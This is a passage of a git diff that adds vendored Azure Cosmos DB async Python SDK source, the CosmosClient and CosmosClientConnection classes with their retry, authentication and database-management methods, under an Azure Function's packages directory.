\ + retry_options._fixed_retry_interval_in_milliseconds + max_backoff = kwargs.pop('retry_backoff_max', None) + retry_options._max_wait_time_in_seconds = max_backoff or retry_options._max_wait_time_in_seconds + policy.RetryOptions = retry_options + connection_retry = policy.ConnectionRetryConfiguration + if not connection_retry: + connection_retry = _ConnectionRetryPolicy( + retry_total=total_retries, + retry_connect=kwargs.pop('retry_connect', None), + retry_read=kwargs.pop('retry_read', None), + retry_status=kwargs.pop('retry_status', None), + retry_backoff_max=max_backoff, + retry_on_status_codes=kwargs.pop('retry_on_status_codes', []), + retry_backoff_factor=kwargs.pop('retry_backoff_factor', 0.8), + ) + policy.ConnectionRetryConfiguration = connection_retry + + return policy + + +class CosmosClient(object): # pylint: disable=client-accepts-api-version-keyword + """A client-side logical representation of an Azure Cosmos DB account. + + Use this client to configure and execute requests to the Azure Cosmos DB service. + + :param str url: The URL of the Cosmos DB account. + :param credential: Can be the account key, or a dictionary of resource tokens. 
+ :type credential: Union[str, Dict[str, str], ~azure.core.credentials_async.AsyncTokenCredential] + :keyword str consistency_level: Consistency level to use for the session. Default value is None (account-level). + More on consistency levels and possible values: https://aka.ms/cosmos-consistency-levels + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START create_client] + :end-before: [END create_client] + :language: python + :dedent: 0 + :caption: Create a new instance of the Cosmos DB client: + :name: create_client + """ + + def __init__( + self, + url: str, + credential: Union[str, Dict[str, str], TokenCredential], + *, + consistency_level: Optional[str] = None, + **kwargs: Any + ) -> None: + """Instantiate a new CosmosClient.""" + auth = _build_auth(credential) + connection_policy = _build_connection_policy(kwargs) + self.client_connection = CosmosClientConnection( + url, + auth=auth, + consistency_level=consistency_level, + connection_policy=connection_policy, + **kwargs + ) + + def __repr__(self) -> str: + return "<CosmosClient [{}]>".format(self.client_connection.url_connection)[:1024] + + async def __aenter__(self): + await self.client_connection.pipeline_client.__aenter__() + await self.client_connection._setup() + return self + + async def __aexit__(self, *args): + return await self.client_connection.pipeline_client.__aexit__(*args) + + async def close(self) -> None: + """Close this instance of CosmosClient.""" + await self.__aexit__() + + @classmethod + def from_connection_string( + cls, + conn_str: str, + *, + credential: Optional[Union[str, Dict[str, str]]] = None, + consistency_level: Optional[str] = None, + **kwargs: Any + ) -> "CosmosClient": + """Create a CosmosClient instance from a connection string. + + This can be retrieved from the Azure portal. For full list of optional + keyword arguments, see the CosmosClient constructor. + + :param str conn_str: The connection string. + :keyword credential: Alternative credentials to use instead of the key provided in the connection string. + :paramtype credential: Union[str, Dict[str, str]] + :keyword str consistency_level: Consistency level to use for the session. Default value is None (account-level). + More on consistency levels and possible values: https://aka.ms/cosmos-consistency-levels + :returns: a CosmosClient instance + :rtype: ~azure.cosmos.aio.CosmosClient + """ + settings = _parse_connection_str(conn_str, credential) + return cls( + url=settings['AccountEndpoint'], + credential=settings['AccountKey'], + consistency_level=consistency_level, + **kwargs + ) + + @staticmethod + def _get_database_link(database_or_id: Union[DatabaseProxy, str, Dict[str, str]]) -> str: + if isinstance(database_or_id, str): + return "dbs/{}".format(database_or_id) + try: + return cast("DatabaseProxy", database_or_id).database_link + except AttributeError: + pass + database_id = cast("Dict[str, str]", database_or_id)["id"] + return "dbs/{}".format(database_id) + + @distributed_trace_async + async def create_database( # pylint: disable=redefined-builtin + self, + id: str, + **kwargs: Any + ) -> DatabaseProxy: + """ + Create a new database with the given ID (name). + + :param str id: ID (name) of the database to create. + :keyword int offer_throughput: The provisioned throughput for this offer. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request.
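# Sketch of from_connection_string plus async-context-manager use as documented
# above; the connection string values and the database name are placeholders.
import asyncio
from azure.cosmos.aio import CosmosClient

async def main():
    conn = "AccountEndpoint=https://<account>.documents.azure.com:443/;AccountKey=<key>;"
    async with CosmosClient.from_connection_string(conn) as client:
        database = await client.create_database("appdb", offer_throughput=400)
        print(database.id)

asyncio.run(main())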
+ :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosResourceExistsError: Database with the given ID already exists. + :returns: A DatabaseProxy instance representing the new database. + :rtype: ~azure.cosmos.aio.DatabaseProxy + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START create_database] + :end-before: [END create_database] + :language: python + :dedent: 0 + :caption: Create a database in the Cosmos DB account: + :name: create_database + """ + + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + offer_throughput = kwargs.pop('offer_throughput', None) + if offer_throughput is not None: + request_options["offerThroughput"] = offer_throughput + + result = await self.client_connection.CreateDatabase(database=dict(id=id), options=request_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return DatabaseProxy(self.client_connection, id=result["id"], properties=result) + + @distributed_trace_async + async def create_database_if_not_exists( # pylint: disable=redefined-builtin + self, + id: str, + **kwargs: Any + ) -> DatabaseProxy: + """ + Create the database if it does not exist already. + + If the database already exists, the existing settings are returned. + + .. note:: + This function does not check or update existing database settings or + offer throughput if they differ from what is passed in. + + :param str id: ID (name) of the database to read or create. + :keyword int offer_throughput: The provisioned throughput for this offer. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The database read or creation failed. + :returns: A DatabaseProxy instance representing the database. + :rtype: ~azure.cosmos.DatabaseProxy + """ + try: + database_proxy = self.get_database_client(id) + await database_proxy.read(**kwargs) + return database_proxy + except CosmosResourceNotFoundError: + return await self.create_database( + id, + **kwargs + ) + + def get_database_client(self, database: Union[str, DatabaseProxy, Dict[str, Any]]) -> DatabaseProxy: + """Retrieve an existing database with the ID (name) `id`. + + :param database: The ID (name), dict representing the properties, or :class:`DatabaseProxy` + instance of the database to get.
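# Sketch of idempotent setup with create_database_if_not_exists above; note the
# docstring's caveat that existing settings and throughput are left untouched.
# The name and throughput value are placeholders.
async def ensure_database(client, name: str):
    return await client.create_database_if_not_exists(name, offer_throughput=400)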
+ :type database: Union[str, ~azure.cosmos.aio.DatabaseProxy, Dict[str, Any]]
+ :returns: A `DatabaseProxy` instance representing the retrieved database.
+ :rtype: ~azure.cosmos.aio.DatabaseProxy
+ """
+ try:
+ id_value = database.id
+ except AttributeError:
+ try:
+ id_value = database['id']
+ except TypeError:
+ id_value = database
+
+ return DatabaseProxy(self.client_connection, id_value)
+
+ @distributed_trace
+ def list_databases(
+ self,
+ **kwargs: Any
+ ) -> AsyncItemPaged[Dict[str, Any]]:
+ """List the databases in a Cosmos DB SQL database account.
+
+ :keyword int max_item_count: Max number of items to be returned in the enumeration operation.
+ :keyword str session_token: Token for use with Session consistency.
+ :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request.
+ :keyword response_hook: A callable invoked with the response metadata.
+ :paramtype response_hook: Callable[[Dict[str, str]], None]
+ :returns: An AsyncItemPaged of database properties (dicts).
+ :rtype: AsyncItemPaged[Dict[str, Any]]
+ """
+ feed_options = _build_options(kwargs)
+ response_hook = kwargs.pop('response_hook', None)
+ max_item_count = kwargs.pop('max_item_count', None)
+ if max_item_count is not None:
+ feed_options["maxItemCount"] = max_item_count
+
+ result = self.client_connection.ReadDatabases(options=feed_options, **kwargs)
+ if response_hook:
+ response_hook(self.client_connection.last_response_headers)
+ return result
+
+ @distributed_trace
+ def query_databases(
+ self,
+ **kwargs: Any
+ ) -> AsyncItemPaged[Dict[str, Any]]:
+ """Query the databases in a Cosmos DB SQL database account.
+
+ :keyword Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute.
+ :keyword parameters: Optional array of parameters to the query.
+ Each parameter is a dict() with 'name' and 'value' keys.
+ :paramtype parameters: List[Dict[str, Any]]
+ :keyword int max_item_count: Max number of items to be returned in the enumeration operation.
+ :keyword str session_token: Token for use with Session consistency.
+ :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request.
+ :keyword response_hook: A callable invoked with the response metadata.
+ :paramtype response_hook: Callable[[Dict[str, str]], None]
+ :returns: An AsyncItemPaged of database properties (dicts).
+ :rtype: AsyncItemPaged[Dict[str, Any]]
+ """
+ feed_options = _build_options(kwargs)
+ response_hook = kwargs.pop('response_hook', None)
+ max_item_count = kwargs.pop('max_item_count', None)
+ if max_item_count is not None:
+ feed_options["maxItemCount"] = max_item_count
+
+ parameters = kwargs.pop('parameters', None)
+ query = kwargs.pop('query', None)
+ result = self.client_connection.QueryDatabases(
+ query=query if parameters is None else dict(query=query, parameters=parameters),
+ options=feed_options,
+ **kwargs)
+ if response_hook:
+ response_hook(self.client_connection.last_response_headers)
+ return result
+
+ @distributed_trace_async
+ async def delete_database(
+ self,
+ database: Union[str, DatabaseProxy, Dict[str, Any]],
+ **kwargs: Any
+ ) -> None:
+ """Delete the database with the given ID (name).
+
+ :param database: The ID (name), dict representing the properties, or :class:`DatabaseProxy`
+ instance of the database to delete.
+ :type database: Union[str, ~azure.cosmos.aio.DatabaseProxy, Dict[str, Any]]
+ :keyword str session_token: Token for use with Session consistency.
+ :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request.
+ :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the database couldn't be deleted. + :rtype: None + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + database_link = self._get_database_link(database) + await self.client_connection.DeleteDatabase(database_link, options=request_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers) + + @distributed_trace_async + async def _get_database_account(self, **kwargs: Any) -> DatabaseAccount: + """Retrieve the database account information. + + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str]], None] + :returns: A `DatabaseAccount` instance representing the Cosmos DB Database Account. + :rtype: ~azure.cosmos.DatabaseAccount + """ + response_hook = kwargs.pop('response_hook', None) + result = await self.client_connection.GetDatabaseAccount(**kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers) + return result diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_cosmos_client_connection_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_cosmos_client_connection_async.py new file mode 100644 index 0000000..684bfc7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_cosmos_client_connection_async.py @@ -0,0 +1,2542 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +# disable (too-many-lines) check +# pylint: disable=C0302 + +"""Document client class for the Azure Cosmos database service. 
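+
+For illustration only, a minimal sketch of how this low-level connection class is
+constructed (the endpoint URL and key below are placeholders)::
+
+ from azure.cosmos.aio._cosmos_client_connection_async import CosmosClientConnection
+
+ connection = CosmosClientConnection(
+ "https://<account>.documents.azure.com:443/",
+ auth={"masterKey": "<account key>"},
+ )
+
+Most applications should instead use :class:`~azure.cosmos.aio.CosmosClient`, which
+wraps this class.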
+""" +# https://github.com/PyCQA/pylint/issues/3112 +# Currently pylint is locked to 2.3.3 and this is fixed in 2.4.4 +from typing import Dict, Any, Optional, TypeVar # pylint: disable=unused-import +from urllib.parse import urlparse +from urllib3.util.retry import Retry +from azure.core.async_paging import AsyncItemPaged +from azure.core import AsyncPipelineClient +from azure.core.exceptions import raise_with_traceback # type: ignore +from azure.core.pipeline.policies import ( + AsyncHTTPPolicy, + ContentDecodePolicy, + HeadersPolicy, + UserAgentPolicy, + NetworkTraceLoggingPolicy, + CustomHookPolicy, + DistributedTracingPolicy, + HttpLoggingPolicy, + ProxyPolicy) + +from .. import _base as base +from .. import documents +from ..documents import ConnectionPolicy +from .. import _constants as constants +from .. import http_constants +from . import _query_iterable_async as query_iterable +from .. import _runtime_constants as runtime_constants +from .. import _request_object +from . import _asynchronous_request as asynchronous_request +from . import _global_endpoint_manager_async as global_endpoint_manager_async +from .._routing.aio import routing_map_provider +from ._retry_utility_async import _ConnectionRetryPolicy +from .. import _session +from .. import _utils +from ..partition_key import _Undefined, _Empty +from ._auth_policy_async import AsyncCosmosBearerTokenCredentialPolicy + +ClassType = TypeVar("ClassType") +# pylint: disable=protected-access + + +class CosmosClientConnection(object): # pylint: disable=too-many-public-methods,too-many-instance-attributes + """Represents a document client. + + Provides a client-side logical representation of the Azure Cosmos + service. This client is used to configure and execute requests against the + service. + + The service client encapsulates the endpoint and credentials used to access + the Azure Cosmos service. + """ + + class _QueryCompatibilityMode: + Default = 0 + Query = 1 + SqlQuery = 2 + + # default number precisions + _DefaultNumberHashPrecision = 3 + _DefaultNumberRangePrecision = -1 + + # default string precision + _DefaultStringHashPrecision = 3 + _DefaultStringRangePrecision = -1 + + def __init__( + self, + url_connection, # type: str + auth, # type: Dict[str, Any] + connection_policy=None, # type: Optional[ConnectionPolicy] + consistency_level=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> None + """ + :param str url_connection: + The URL for connecting to the DB server. + :param dict auth: + Contains 'masterKey' or 'resourceTokens', where + auth['masterKey'] is the default authorization key to use to + create the client, and auth['resourceTokens'] is the alternative + authorization key. + :param documents.ConnectionPolicy connection_policy: + The connection policy for the client. + :param documents.ConsistencyLevel consistency_level: + The default consistency policy for client operations. 
+ + """ + self.url_connection = url_connection + + self.master_key = None + self.resource_tokens = None + self.aad_credentials = None + if auth is not None: + self.master_key = auth.get("masterKey") + self.resource_tokens = auth.get("resourceTokens") + self.aad_credentials = auth.get("clientSecretCredential") + + if auth.get("permissionFeed"): + self.resource_tokens = {} + for permission_feed in auth["permissionFeed"]: + resource_parts = permission_feed["resource"].split("/") + id_ = resource_parts[-1] + self.resource_tokens[id_] = permission_feed["_token"] + + self.connection_policy = connection_policy or ConnectionPolicy() + + self.partition_resolvers = {} # type: Dict[str, Any] + + self.partition_key_definition_cache = {} # type: Dict[str, Any] + + self.default_headers = { + http_constants.HttpHeaders.CacheControl: "no-cache", + http_constants.HttpHeaders.Version: http_constants.Versions.CurrentVersion, + # For single partition query with aggregate functions we would try to accumulate the results on the SDK. + # We need to set continuation as not expected. + http_constants.HttpHeaders.IsContinuationExpected: False, + } + + if consistency_level is not None: + self.default_headers[http_constants.HttpHeaders.ConsistencyLevel] = consistency_level + + # Keeps the latest response headers from the server. + self.last_response_headers = None + + self._useMultipleWriteLocations = False + self._global_endpoint_manager = global_endpoint_manager_async._GlobalEndpointManager(self) + + retry_policy = None + if isinstance(self.connection_policy.ConnectionRetryConfiguration, AsyncHTTPPolicy): + retry_policy = self.connection_policy.ConnectionRetryConfiguration + elif isinstance(self.connection_policy.ConnectionRetryConfiguration, int): + retry_policy = _ConnectionRetryPolicy(total=self.connection_policy.ConnectionRetryConfiguration) + elif isinstance(self.connection_policy.ConnectionRetryConfiguration, Retry): + # Convert a urllib3 retry policy to a Pipeline policy + retry_policy = _ConnectionRetryPolicy( + retry_total=self.connection_policy.ConnectionRetryConfiguration.total, + retry_connect=self.connection_policy.ConnectionRetryConfiguration.connect, + retry_read=self.connection_policy.ConnectionRetryConfiguration.read, + retry_status=self.connection_policy.ConnectionRetryConfiguration.status, + retry_backoff_max=self.connection_policy.ConnectionRetryConfiguration.BACKOFF_MAX, + retry_on_status_codes=list(self.connection_policy.ConnectionRetryConfiguration.status_forcelist), + retry_backoff_factor=self.connection_policy.ConnectionRetryConfiguration.backoff_factor + ) + else: + raise TypeError( + "Unsupported retry policy. 
Must be an azure.cosmos.ConnectionRetryPolicy, int, or urllib3.Retry")
+
+ proxies = kwargs.pop('proxies', {})
+ if self.connection_policy.ProxyConfiguration and self.connection_policy.ProxyConfiguration.Host:
+ host = self.connection_policy.ProxyConfiguration.Host
+ url = urlparse(host)
+ proxy = host if url.port else host + ":" + str(self.connection_policy.ProxyConfiguration.Port)
+ proxies.update({url.scheme: proxy})
+
+ self._user_agent = _utils.get_user_agent_async()
+
+ credentials_policy = None
+ if self.aad_credentials:
+ scopes = base.create_scope_from_url(self.url_connection)
+ credentials_policy = AsyncCosmosBearerTokenCredentialPolicy(self.aad_credentials, scopes)
+
+ policies = [
+ HeadersPolicy(**kwargs),
+ ProxyPolicy(proxies=proxies),
+ UserAgentPolicy(base_user_agent=self._user_agent, **kwargs),
+ ContentDecodePolicy(),
+ retry_policy,
+ credentials_policy,
+ CustomHookPolicy(**kwargs),
+ NetworkTraceLoggingPolicy(**kwargs),
+ DistributedTracingPolicy(**kwargs),
+ HttpLoggingPolicy(**kwargs),
+ ]
+
+ transport = kwargs.pop("transport", None)
+ self.pipeline_client = AsyncPipelineClient(base_url=url_connection, transport=transport, policies=policies)
+ self._setup_kwargs = kwargs
+
+ # Query compatibility mode.
+ # Allows specifying the compatibility mode used by the client when making query requests. Should be
+ # removed when application/sql is no longer supported.
+ self._query_compatibility_mode = CosmosClientConnection._QueryCompatibilityMode.Default
+
+ # Routing map provider
+ self._routing_map_provider = routing_map_provider.SmartRoutingMapProvider(self)
+
+ @property
+ def _Session(self):
+ """Gets the session object from the client."""
+ return self.session
+
+ @_Session.setter
+ def _Session(self, session):
+ """Sets a session object on the document client.
+
+ This will override the existing session.
+ """
+ self.session = session
+
+ @property
+ def _WriteEndpoint(self):
+ """Gets the current write endpoint for a geo-replicated database account.
+ """
+ return self._global_endpoint_manager.get_write_endpoint()
+
+ @property
+ def _ReadEndpoint(self):
+ """Gets the current read endpoint for a geo-replicated database account.
+ """
+ return self._global_endpoint_manager.get_read_endpoint()
+
+ async def _setup(self):
+
+ if 'database_account' not in self._setup_kwargs:
+ database_account = await self._global_endpoint_manager._GetDatabaseAccount(
+ **self._setup_kwargs)
+ self._setup_kwargs['database_account'] = database_account
+ await self._global_endpoint_manager.force_refresh(self._setup_kwargs['database_account'])
+ else:
+ database_account = self._setup_kwargs.get('database_account')
+
+ # Save the choice that was made (either None or some value) and branch to set or get the consistency
+ if self.default_headers.get(http_constants.HttpHeaders.ConsistencyLevel):
+ user_defined_consistency = self.default_headers[http_constants.HttpHeaders.ConsistencyLevel]
+ else:
+ # Use database_account if no consistency passed in to verify consistency level to be used
+ user_defined_consistency = self._check_if_account_session_consistency(database_account)
+
+ if user_defined_consistency == documents.ConsistencyLevel.Session:
+ # create a Session if the user wants Session consistency
+ self.session = _session.Session(self.url_connection)
+ else:
+ self.session = None # type: ignore
+
+ def _check_if_account_session_consistency(
+ self,
+ database_account: ClassType,
+ ) -> str:
+ """Checks account consistency level to set header if needed.
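+
+ In effect, a simplified sketch of the check performed below (constant and
+ header names abbreviated from the ones used in this module)::
+
+ level = database_account.ConsistencyPolicy.get(DefaultConsistencyLevel)
+ if level == documents.ConsistencyLevel.Session:
+ self.default_headers[HttpHeaders.ConsistencyLevel] = level
+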
+ :param database_account: The database account to be used to check consistency levels.
+ :type database_account: ~azure.cosmos.documents.DatabaseAccount
+ :return: The account consistency level.
+ :rtype: str
+ """
+ # Set to default level present in account
+ user_consistency_policy = database_account.ConsistencyPolicy
+ consistency_level = user_consistency_policy.get(constants._Constants.DefaultConsistencyLevel)
+
+ if consistency_level == documents.ConsistencyLevel.Session:
+ # We only set the header if we're using session consistency in the account in order to keep
+ # the current update_session logic which uses the header
+ self.default_headers[http_constants.HttpHeaders.ConsistencyLevel] = consistency_level
+
+ return consistency_level
+
+ def _GetDatabaseIdWithPathForUser(self, database_link, user): # pylint: disable=no-self-use
+ CosmosClientConnection.__ValidateResource(user)
+ path = base.GetPathFromLink(database_link, "users")
+ database_id = base.GetResourceIdOrFullNameFromLink(database_link)
+ return database_id, path
+
+ def _GetContainerIdWithPathForSproc(self, collection_link, sproc): # pylint: disable=no-self-use
+ CosmosClientConnection.__ValidateResource(sproc)
+ sproc = sproc.copy()
+ if sproc.get("serverScript"):
+ sproc["body"] = str(sproc.pop("serverScript", ""))
+ elif sproc.get("body"):
+ sproc["body"] = str(sproc["body"])
+ path = base.GetPathFromLink(collection_link, "sprocs")
+ collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)
+ return collection_id, path, sproc
+
+ def _GetContainerIdWithPathForTrigger(self, collection_link, trigger): # pylint: disable=no-self-use
+ CosmosClientConnection.__ValidateResource(trigger)
+ trigger = trigger.copy()
+ if trigger.get("serverScript"):
+ trigger["body"] = str(trigger.pop("serverScript", ""))
+ elif trigger.get("body"):
+ trigger["body"] = str(trigger["body"])
+
+ path = base.GetPathFromLink(collection_link, "triggers")
+ collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)
+ return collection_id, path, trigger
+
+ def _GetContainerIdWithPathForUDF(self, collection_link, udf): # pylint: disable=no-self-use
+ CosmosClientConnection.__ValidateResource(udf)
+ udf = udf.copy()
+ if udf.get("serverScript"):
+ udf["body"] = str(udf.pop("serverScript", ""))
+ elif udf.get("body"):
+ udf["body"] = str(udf["body"])
+
+ path = base.GetPathFromLink(collection_link, "udfs")
+ collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)
+ return collection_id, path, udf
+
+ async def GetDatabaseAccount(self, url_connection=None, **kwargs):
+ """Gets database account info.
+
+ :return:
+ The Database Account.
+ :rtype: + documents.DatabaseAccount + + """ + if url_connection is None: + url_connection = self.url_connection + + initial_headers = dict(self.default_headers) + headers = base.GetHeaders(self, initial_headers, "get", "", "", "", {}) # path # id # type + + request_params = _request_object.RequestObject("databaseaccount", documents._OperationType.Read, url_connection) + result, self.last_response_headers = await self.__Get("", request_params, headers, **kwargs) + database_account = documents.DatabaseAccount() + database_account.DatabasesLink = "/dbs/" + database_account.MediaLink = "/media/" + if http_constants.HttpHeaders.MaxMediaStorageUsageInMB in self.last_response_headers: + database_account.MaxMediaStorageUsageInMB = self.last_response_headers[ + http_constants.HttpHeaders.MaxMediaStorageUsageInMB + ] + if http_constants.HttpHeaders.CurrentMediaStorageUsageInMB in self.last_response_headers: + database_account.CurrentMediaStorageUsageInMB = self.last_response_headers[ + http_constants.HttpHeaders.CurrentMediaStorageUsageInMB + ] + database_account.ConsistencyPolicy = result.get(constants._Constants.UserConsistencyPolicy) + + # WritableLocations and ReadableLocations fields will be available only for geo-replicated database accounts + if constants._Constants.WritableLocations in result: + database_account._WritableLocations = result[constants._Constants.WritableLocations] + if constants._Constants.ReadableLocations in result: + database_account._ReadableLocations = result[constants._Constants.ReadableLocations] + if constants._Constants.EnableMultipleWritableLocations in result: + database_account._EnableMultipleWritableLocations = result[ + constants._Constants.EnableMultipleWritableLocations + ] + + self._useMultipleWriteLocations = ( + self.connection_policy.UseMultipleWriteLocations and database_account._EnableMultipleWritableLocations + ) + return database_account + + async def CreateDatabase(self, database, options=None, **kwargs): + """Creates a database. + + :param dict database: + The Azure Cosmos database to create. + :param dict options: + The request options for the request. + + :return: + The Database that was created. + :rtype: dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(database) + path = "/dbs" + return await self.Create(database, path, "dbs", None, None, options, **kwargs) + + async def CreateUser(self, database_link, user, options=None, **kwargs): + """Creates a user. + + :param str database_link: + The link to the database. + :param dict user: + The Azure Cosmos user to create. + :param dict options: + The request options for the request. + + :return: + The created User. + :rtype: + dict + + """ + if options is None: + options = {} + + database_id, path = self._GetDatabaseIdWithPathForUser(database_link, user) + return await self.Create(user, path, "users", database_id, None, options, **kwargs) + + async def CreateContainer(self, database_link, collection, options=None, **kwargs): + """Creates a collection in a database. + + :param str database_link: + The link to the database. + :param dict collection: + The Azure Cosmos collection to create. + :param dict options: + The request options for the request. + + :return: The Collection that was created. 
+ :rtype: dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(collection) + path = base.GetPathFromLink(database_link, "colls") + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + return await self.Create(collection, path, "colls", database_id, None, options, **kwargs) + + async def CreateItem(self, database_or_container_link, document, options=None, **kwargs): + """Creates a document in a collection. + + :param str database_or_container_link: + The link to the database when using partitioning, otherwise link to the document collection. + :param dict document: + The Azure Cosmos document to create. + :param dict options: + The request options for the request. + :param bool options['disableAutomaticIdGeneration']: + Disables the automatic id generation. If id is missing in the body and this + option is true, an error will be returned. + + :return: + The created Document. + :rtype: + dict + + """ + # Python's default arguments are evaluated once when the function is defined, + # not each time the function is called (like it is in say, Ruby). This means + # that if you use a mutable default argument and mutate it, you will and have + # mutated that object for all future calls to the function as well. So, using + # a non-mutable default in this case(None) and assigning an empty dict(mutable) + # inside the method For more details on this gotcha, please refer + # http://docs.python-guide.org/en/latest/writing/gotchas/ + if options is None: + options = {} + + # We check the link to be document collection link since it can be database + # link in case of client side partitioning + collection_id, document, path = self._GetContainerIdWithPathForItem( + database_or_container_link, document, options + ) + + if base.IsItemContainerLink(database_or_container_link): + options = await self._AddPartitionKey(database_or_container_link, document, options) + + return await self.Create(document, path, "docs", collection_id, None, options, **kwargs) + + async def CreatePermission(self, user_link, permission, options=None, **kwargs): + """Creates a permission for a user. + + :param str user_link: + The link to the user entity. + :param dict permission: + The Azure Cosmos user permission to create. + :param dict options: + The request options for the request. + + :return: + The created Permission. + :rtype: + dict + + """ + if options is None: + options = {} + + path, user_id = self._GetUserIdWithPathForPermission(permission, user_link) + return await self.Create(permission, path, "permissions", user_id, None, options, **kwargs) + + async def CreateUserDefinedFunction(self, collection_link, udf, options=None, **kwargs): + """Creates a user-defined function in a collection. + + :param str collection_link: + The link to the collection. + :param str udf: + :param dict options: + The request options for the request. + + :return: + The created UDF. + :rtype: + dict + + """ + if options is None: + options = {} + + collection_id, path, udf = self._GetContainerIdWithPathForUDF(collection_link, udf) + return await self.Create(udf, path, "udfs", collection_id, None, options, **kwargs) + + async def CreateTrigger(self, collection_link, trigger, options=None, **kwargs): + """Creates a trigger in a collection. + + :param str collection_link: + The link to the document collection. + :param dict trigger: + :param dict options: + The request options for the request. + + :return: + The created Trigger. 
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ collection_id, path, trigger = self._GetContainerIdWithPathForTrigger(collection_link, trigger)
+ return await self.Create(trigger, path, "triggers", collection_id, None, options, **kwargs)
+
+ async def CreateStoredProcedure(self, collection_link, sproc, options=None, **kwargs):
+ """Creates a stored procedure in a collection.
+
+ :param str collection_link:
+ The link to the document collection.
+ :param dict sproc:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The created Stored Procedure.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ collection_id, path, sproc = self._GetContainerIdWithPathForSproc(collection_link, sproc)
+ return await self.Create(sproc, path, "sprocs", collection_id, None, options, **kwargs)
+
+ async def ExecuteStoredProcedure(self, sproc_link, params, options=None, **kwargs):
+ """Executes a stored procedure.
+
+ :param str sproc_link:
+ The link to the stored procedure.
+ :param params:
+ A list of parameters for the stored procedure, or None.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The Stored Procedure response.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ initial_headers = dict(self.default_headers)
+ initial_headers.update({http_constants.HttpHeaders.Accept: (runtime_constants.MediaTypes.Json)})
+
+ if params and not isinstance(params, list):
+ params = [params]
+
+ path = base.GetPathFromLink(sproc_link)
+ sproc_id = base.GetResourceIdOrFullNameFromLink(sproc_link)
+ headers = base.GetHeaders(self, initial_headers, "post", path, sproc_id, "sprocs", options)
+
+ # ExecuteStoredProcedure will use WriteEndpoint since it uses POST operation
+ request_params = _request_object.RequestObject("sprocs", documents._OperationType.ExecuteJavaScript)
+ result, self.last_response_headers = await self.__Post(path, request_params, params, headers, **kwargs)
+ return result
+
+ async def Create(self, body, path, typ, id, initial_headers, options=None, **kwargs): # pylint: disable=redefined-builtin
+ """Creates an Azure Cosmos resource and returns it.
+
+ :param dict body:
+ :param str path:
+ :param str typ:
+ :param str id:
+ :param dict initial_headers:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The created Azure Cosmos resource.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ initial_headers = initial_headers or self.default_headers
